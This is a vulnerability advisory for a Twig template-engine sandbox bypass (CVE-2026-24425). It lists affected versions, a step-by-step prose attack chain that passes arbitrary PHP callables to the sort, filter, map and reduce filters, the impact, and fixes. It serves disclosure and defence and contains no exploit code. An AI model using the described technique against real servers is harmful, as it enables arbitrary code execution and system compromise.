CVE-2026-24425: Twig Sandbox Bypass Vulnerability

Twig, a flexible template engine for PHP, is susceptible to a sandbox bypass vulnerability identified as CVE-2026-24425. This flaw affects versions 2.16.x and 3.9.0 through 3.25.x. The vulnerability resides within the SourcePolicyInterface, which is intended to enforce security restrictions on template execution. However, a flaw in the runtime check allows attackers with template rendering capabilities to circumvent these restrictions. Specifically, attackers can pass arbitrary PHP callables to sort, filter, map, and reduce filters, leading to arbitrary code execution if the sandbox is enabled via a source policy. This bypass occurs because the runtime check fails to use the current template source, allowing malicious code to be injected and executed.

Attack Chain

1. An attacker gains the ability to render Twig templates, often through a web application vulnerability such as template injection.
2. The application uses a SourcePolicyInterface to enable a security sandbox for Twig templates.
3. The attacker crafts a malicious Twig template that leverages the sort, filter, map, or reduce filters.
4. Within these filters, the attacker provides an arbitrary PHP callable function.
5. The vulnerable runtime check fails to properly validate the source of the template.
6. The arbitrary PHP callable is executed without proper sandbox restrictions.
7. The attacker achieves arbitrary code execution on the server.

Impact

Successful exploitation of this vulnerability allows attackers with template rendering capabilities to bypass the intended security sandbox and execute arbitrary code on the server. This can lead to complete system compromise, data theft, or denial of service. While the specific number of affected installations is unknown, any application using Twig within the specified version range and relying on SourcePolicyInterface for sandboxing is potentially vulnerable.

Recommendation

• Upgrade Twig to version 3.26.0 or later, which contains a fix for CVE-2026-24425.
• If upgrading is not immediately feasible, avoid using SourcePolicyInterface for sandboxing and rely on global sandbox settings instead.
• Monitor web server logs for suspicious activity related to template rendering, particularly the use of sort, filter, map, and reduce filters.
• Deploy the Sigma rule “Detect Twig Sandbox Bypass Attempt via PHP Callable” to identify potential exploitation attempts in web server logs.